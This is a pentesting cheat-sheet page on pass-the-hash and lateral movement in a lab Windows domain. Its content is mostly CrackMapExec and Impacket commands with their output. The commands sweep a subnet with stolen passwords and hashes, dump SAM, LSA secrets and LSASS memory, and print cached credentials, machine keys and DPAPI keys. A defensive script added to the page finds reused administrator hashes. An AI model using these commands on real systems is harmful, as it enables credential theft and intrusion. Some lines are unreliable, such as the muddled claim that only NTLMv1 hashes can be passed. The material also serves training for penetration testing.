Pentesting Quick Reference OSCP and Beyond

Pass the Hash


Last updated 27 days ago

We can use the password or hash to move laterally in the network.

How to get the hash

Metasploit Hashdump

Impacket

Crackmapexec PTH

We can pass a password and sweep the subnet

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u fcastle -d MARVEL.local -p Password1
SMB         192.168.145.138 445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False)
SMB         192.168.145.140 445    SPIDERMAN        [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         192.168.145.139 445    THEPUNISHER      [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         192.168.145.138 445    HYDRA-DC         [+] MARVEL.local\fcastle:Password1 
SMB         192.168.145.140 445    SPIDERMAN        [+] MARVEL.local\fcastle:Password1 (Pwn3d!)
SMB         192.168.145.139 445    THEPUNISHER      [+] MARVEL.local\fcastle:Password1 (Pwn3d!)

We can also pass a hash (this works only with NTLMv1; NTLMv2 can be relayed, not passed).

Capabilities of crackmapexec

crackmapexec smb -L
(lists the available capabilities)

We can dump the SAM, LSA secrets, or SMB shares:

crackmapexec smb <target_ip> -u Administrator -p <password> --sam --local-auth
crackmapexec smb <target_ip> -u Administrator -p <password> --lsa --local-auth
crackmapexec smb <target_ip> -u Administrator -p <password> --shares --local-auth
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u fcastle -d MARVEL.local -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --sam     
SMB         192.168.145.138 445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False)
SMB         192.168.145.140 445    SPIDERMAN        [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         192.168.145.139 445    THEPUNISHER      [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         192.168.145.138 445    HYDRA-DC         [+] MARVEL.local\fcastle:64f12cddaa88057e06a81b54e73b949b 
SMB         192.168.145.140 445    SPIDERMAN        [+] MARVEL.local\fcastle:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.139 445    THEPUNISHER      [+] MARVEL.local\fcastle:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.140 445    SPIDERMAN        [+] Dumping SAM hashes
SMB         192.168.145.139 445    THEPUNISHER      [+] Dumping SAM hashes
SMB         192.168.145.140 445    SPIDERMAN        Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB         192.168.145.140 445    SPIDERMAN        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.145.139 445    THEPUNISHER      Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB         192.168.145.139 445    THEPUNISHER      Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.145.140 445    SPIDERMAN        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.145.140 445    SPIDERMAN        WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6c42d69c9d60ac3c1412febf3d04ca76:::
SMB         192.168.145.139 445    THEPUNISHER      DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.145.140 445    SPIDERMAN        peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB         192.168.145.140 445    SPIDERMAN        [+] Added 5 SAM hashes to the database
SMB         192.168.145.139 445    THEPUNISHER      WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb:::
SMB         192.168.145.139 445    THEPUNISHER      frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB         192.168.145.139 445    THEPUNISHER      [+] Added 5 SAM hashes to the database
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --local-auth --shares
SMB         192.168.145.139 445    THEPUNISHER      [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False)
SMB         192.168.145.138 445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False)
SMB         192.168.145.140 445    SPIDERMAN        [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:SPIDERMAN) (signing:False) (SMBv1:False)
SMB         192.168.145.139 445    THEPUNISHER      [+] THEPUNISHER\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.138 445    HYDRA-DC         [-] HYDRA-DC\administrator:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE 
SMB         192.168.145.140 445    SPIDERMAN        [+] SPIDERMAN\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.139 445    THEPUNISHER      [+] Enumerated shares
SMB         192.168.145.139 445    THEPUNISHER      Share           Permissions     Remark
SMB         192.168.145.139 445    THEPUNISHER      -----           -----------     ------
SMB         192.168.145.139 445    THEPUNISHER      ADMIN$          READ,WRITE      Remote Admin
SMB         192.168.145.139 445    THEPUNISHER      C$              READ,WRITE      Default share
SMB         192.168.145.139 445    THEPUNISHER      IPC$            READ            Remote IPC
SMB         192.168.145.140 445    SPIDERMAN        [+] Enumerated shares
SMB         192.168.145.140 445    SPIDERMAN        Share           Permissions     Remark
SMB         192.168.145.140 445    SPIDERMAN        -----           -----------     ------
SMB         192.168.145.140 445    SPIDERMAN        ADMIN$          READ,WRITE      Remote Admin
SMB         192.168.145.140 445    SPIDERMAN        C$              READ,WRITE      Default share
SMB         192.168.145.140 445    SPIDERMAN        IPC$            READ            Remote IPC
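
The SAM dumps above show why one local Administrator hash authenticated to both workstations: the same NT hash is stored on each host. The following is an added example (not part of the original page or of CrackMapExec) that parses SAM lines in the format shown above and reports NT hashes shared across hosts and blank-password entries, the findings that map to giving each host a unique local administrator password. The function names are illustrative, and the sample lines are copied from the output above.

```python
import re
from collections import defaultdict

# NT hash of the empty string, and the placeholder LM hash that appears
# when no LM hash is stored for the account.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# CrackMapExec prefixes each SAM entry (user:rid:lmhash:nthash:::) with
# protocol, IP, port and hostname columns.
SAM_LINE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+(?P<host>\S+)\s+"
    r"(?P<user>[^:\s]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$"
)

# Sample input: lines copied from the --sam output on this page.
SAMPLE = """
SMB         192.168.145.140 445    SPIDERMAN        [+] Dumping SAM hashes
SMB         192.168.145.140 445    SPIDERMAN        Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB         192.168.145.140 445    SPIDERMAN        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.145.139 445    THEPUNISHER      Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB         192.168.145.139 445    THEPUNISHER      Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.145.140 445    SPIDERMAN        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.145.140 445    SPIDERMAN        WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6c42d69c9d60ac3c1412febf3d04ca76:::
SMB         192.168.145.139 445    THEPUNISHER      DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.145.140 445    SPIDERMAN        peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB         192.168.145.140 445    SPIDERMAN        [+] Added 5 SAM hashes to the database
SMB         192.168.145.139 445    THEPUNISHER      WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb:::
SMB         192.168.145.139 445    THEPUNISHER      frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
"""


def parse_sam(text):
    """Return one dict per SAM entry; banner and status lines are skipped."""
    entries = []
    for line in text.splitlines():
        match = SAM_LINE.match(line.strip())
        if not match:
            continue
        entry = match.groupdict()
        entry["rid"] = int(entry["rid"])
        entry["lm"] = entry["lm"].lower()
        entry["nt"] = entry["nt"].lower()
        entries.append(entry)
    return entries


def audit(entries):
    """Group accounts by NT hash and collect remediation findings."""
    by_nt = defaultdict(set)
    findings = {"shared_across_hosts": {}, "blank_password": [], "lm_hash_stored": []}
    for entry in entries:
        account = (entry["host"], entry["user"])
        if entry["nt"] == EMPTY_NT:
            # Empty password; built-in accounts such as Guest are usually disabled.
            findings["blank_password"].append(account)
        else:
            by_nt[entry["nt"]].add(account)
        if entry["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(account)
    for nt_hash, accounts in by_nt.items():
        # Same hash on more than one host: one captured hash opens all of them.
        if len({host for host, _ in accounts}) > 1:
            findings["shared_across_hosts"][nt_hash] = sorted(accounts)
    return findings


if __name__ == "__main__":
    report = audit(parse_sam(SAMPLE))
    for nt_hash, accounts in report["shared_across_hosts"].items():
        print(f"NT hash {nt_hash} is shared by: {accounts}")
    print("Blank-password entries:", report["blank_password"])
    print("Accounts with a stored LM hash:", report["lm_hash_stored"])
```
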

Dumping Memory

crackmapexec smb <target_ip> -u <username> -p <password> -M lsassy -o METHOD=nanodump

🔍 --lsa in CrackMapExec

Purpose: Dumps LSA secrets from the registry, such as:

  • Stored service account passwords

  • Cached domain credentials

  • Auto-logon passwords

  • Scheduled task creds

Mechanism: This is a registry read, not a memory dump. It does not touch LSASS directly.

Command Example:

crackmapexec smb <target_ip> -u <username> -p <password> --lsa

Requires:

  • Administrator privileges

  • Access to registry remotely

Output Example:

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --local-auth --lsa   
SMB         192.168.145.139 445    THEPUNISHER      [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False)
SMB         192.168.145.138 445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False)
SMB         192.168.145.140 445    SPIDERMAN        [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:SPIDERMAN) (signing:False) (SMBv1:False)
SMB         192.168.145.139 445    THEPUNISHER      [+] THEPUNISHER\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.138 445    HYDRA-DC         [-] HYDRA-DC\administrator:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE 
SMB         192.168.145.140 445    SPIDERMAN        [+] SPIDERMAN\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.139 445    THEPUNISHER      [+] Dumping LSA secrets
SMB         192.168.145.140 445    SPIDERMAN        [+] Dumping LSA secrets
SMB         192.168.145.139 445    THEPUNISHER      MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-14 05:44:23)
SMB         192.168.145.139 445    THEPUNISHER      MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-14 07:44:02)
SMB         192.168.145.140 445    SPIDERMAN        MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-14 07:53:16)
SMB         192.168.145.140 445    SPIDERMAN        MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-16 06:49:57)
SMB         192.168.145.140 445    SPIDERMAN        MARVEL.LOCAL/pparker:$DCC2$10240#pparker#9f28ff35b303d014c9e85e35ab47d019: (2025-05-16 07:00:00)
SMB         192.168.145.139 445    THEPUNISHER      MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4
SMB         192.168.145.140 445    SPIDERMAN        MARVEL\SPIDERMAN$:aes256-cts-hmac-sha1-96:c131c1e90e95f1b416556a534b8cb0ee62dd96cc145c46b0eb6d11f73eb1a5d1
SMB         192.168.145.139 445    THEPUNISHER      MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b
SMB         192.168.145.139 445    THEPUNISHER      MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4
SMB         192.168.145.139 445    THEPUNISHER      MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00                                                                                                                                         
SMB         192.168.145.139 445    THEPUNISHER      MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0:::
SMB         192.168.145.139 445    THEPUNISHER      dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2
dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28                                                                                                                                                                                    
SMB         192.168.145.139 445    THEPUNISHER      NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063
SMB         192.168.145.139 445    THEPUNISHER      [+] Dumped 9 LSA secrets to /home/kali/.cme/logs/THEPUNISHER_192.168.145.139_2025-05-20_232936.secrets and /home/kali/.cme/logs/THEPUNISHER_192.168.145.139_2025-05-20_232936.cached
SMB         192.168.145.140 445    SPIDERMAN        MARVEL\SPIDERMAN$:aes128-cts-hmac-sha1-96:8234a83db77e524d118254a404aa48b2
SMB         192.168.145.140 445    SPIDERMAN        MARVEL\SPIDERMAN$:des-cbc-md5:61c2c129effe1ab3
SMB         192.168.145.140 445    SPIDERMAN        MARVEL\SPIDERMAN$:plain_password_hex:a2c5160c8c59c6a5e7ef3f304d110706f4365b36debbb27afdd4e37eadabe6443cb79031a728372c0d53558b1275186299aa74515f8c2f839527b86a1e3ef3e7d36273ab39c3117fe8d8c5acf02121b8cb5731bc8b99ec7752fc9bcfd8d78d4886ab65e6596a5cc60f9f86b5eeccdcddc7f5427ded633d50590f5bb16bb24d5ebaae02fc03afad34c6ec421293c3485d59271a713c1f008d4dbd889166d642b89fd6922404566532d775cd5a25a91d770fb8cbf4eca57c45e82b0b05fa33825e5fc47915705f187895da756590e30b45fefb4a348fc33bad9efec57e07c537f7d93689582c4be10f8218dc05b7980a03                                                                                                                                           
SMB         192.168.145.140 445    SPIDERMAN        MARVEL\SPIDERMAN$:aad3b435b51404eeaad3b435b51404ee:8e5314ef4d8a661d84f21118e80ecc9a:::
SMB         192.168.145.140 445    SPIDERMAN        dpapi_machinekey:0x6380f87fdc42b92f622c31e7145a2fab193d5341
dpapi_userkey:0x4214531dfc2db4013de58ed96a7b088c7fbbb6e9                                                                                                                                                                                    
SMB         192.168.145.140 445    SPIDERMAN        NL$KM:b47d88cd15dd2f727f1e5dbbb6086ac5085d53578924e84553154bf44d1483a6a877696579c58b9be2d2adfc665199da58447bb258affaa8c543903649ee4f4d
SMB         192.168.145.140 445    SPIDERMAN        [+] Dumped 10 LSA secrets to /home/kali/.cme/logs/SPIDERMAN_192.168.145.140_2025-05-20_232936.secrets and /home/kali/.cme/logs/SPIDERMAN_192.168.145.140_2025-05-20_232936.cached

🧠 -M lsassy Module

Purpose: Dumps live credentials from LSASS memory, including:

  • Cleartext passwords

  • NTLM hashes

  • Kerberos tickets

Mechanism: Runs a memory dump using a method like procdump, comsvcs, or nanodump, then parses it using lsassy.

Command Example:

crackmapexec smb <target_ip> -u <username> -p <password> -M lsassy

Requires:

  • Administrator privileges

  • Ability to execute dump remotely

  • AV/EDR may block it

Output Example:

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --local-auth -M lsassy
SMB         192.168.145.138 445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False)
SMB         192.168.145.139 445    THEPUNISHER      [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False)
SMB         192.168.145.140 445    SPIDERMAN        [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:SPIDERMAN) (signing:False) (SMBv1:False)
SMB         192.168.145.138 445    HYDRA-DC         [-] HYDRA-DC\administrator:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE 
SMB         192.168.145.139 445    THEPUNISHER      [+] THEPUNISHER\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.140 445    SPIDERMAN        [+] SPIDERMAN\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)

CrackMapExec database

Keeps a record of all cracked user accounts.

┌──(kali㉿kali)-[~]
└─$ cmedb
cmedb (default)(smb) > creds

+Credentials---------+-----------+-------------+--------------------+-------------------------------------------------------------------+
| CredID | Admin On  | CredType  | Domain      | UserName           | Password                                                          |
+--------+-----------+-----------+-------------+--------------------+-------------------------------------------------------------------+
| 1      | 2 Host(s) | plaintext | MARVEL      | fcastle            | Password1                                                         |
| 2      | 0 Host(s) | hash      | THEPUNISHER | Administrator      | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b |
| 3      | 0 Host(s) | hash      | SPIDERMAN   | Administrator      | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b |
| 4      | 0 Host(s) | hash      | THEPUNISHER | Guest              | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
| 5      | 0 Host(s) | hash      | SPIDERMAN   | Guest              | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
| 6      | 0 Host(s) | hash      | THEPUNISHER | DefaultAccount     | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
| 7      | 0 Host(s) | hash      | SPIDERMAN   | DefaultAccount     | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
| 8      | 0 Host(s) | hash      | THEPUNISHER | WDAGUtilityAccount | aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb |
| 9      | 0 Host(s) | hash      | SPIDERMAN   | WDAGUtilityAccount | aad3b435b51404eeaad3b435b51404ee:6c42d69c9d60ac3c1412febf3d04ca76 |
| 10     | 0 Host(s) | hash      | THEPUNISHER | frankcastle        | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b |
| 11     | 0 Host(s) | hash      | SPIDERMAN   | peterparker        | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b |
| 12     | 2 Host(s) | hash      | MARVEL      | fcastle            | 64f12cddaa88057e06a81b54e73b949b                                  |
+--------+-----------+-----------+-------------+--------------------+-------------------------------------------------------------------+

Dumping Hashes

Secrets Dump

Dumps the SAM as well as other secrets from the registry.

impacket-secretsdump 'MARVEL.local/fcastle:[email protected]'

Secrets Dump from Hash

┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump 'MARVEL.local/fcastle:[email protected]'                

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xec9be313e502a2aa71fd4e8e4c9999d5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb:::
frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-14 05:44:23)
MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-14 07:44:02)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4
MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b
MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4
MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00
MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2
dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28
[*] NL$KM 
 0000   09 9F C6 F6 60 EF 09 3E  30 CC 5B AA C7 AC 5A FB   ....`..>0.[...Z.
 0010   CA 61 47 50 2D 62 B1 36  D6 59 69 2F 82 CB 81 DE   .aGP-b.6.Yi/....
 0020   D8 20 BF 99 BA 90 0C 47  10 9E 8E CB F5 01 E2 F0   . .....G........
 0030   0C 9C FC 1A BF AD 66 7B  03 11 DA A4 DF CD 60 63   ......f{......`c
NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
Add --local-auth, as we are authenticating locally.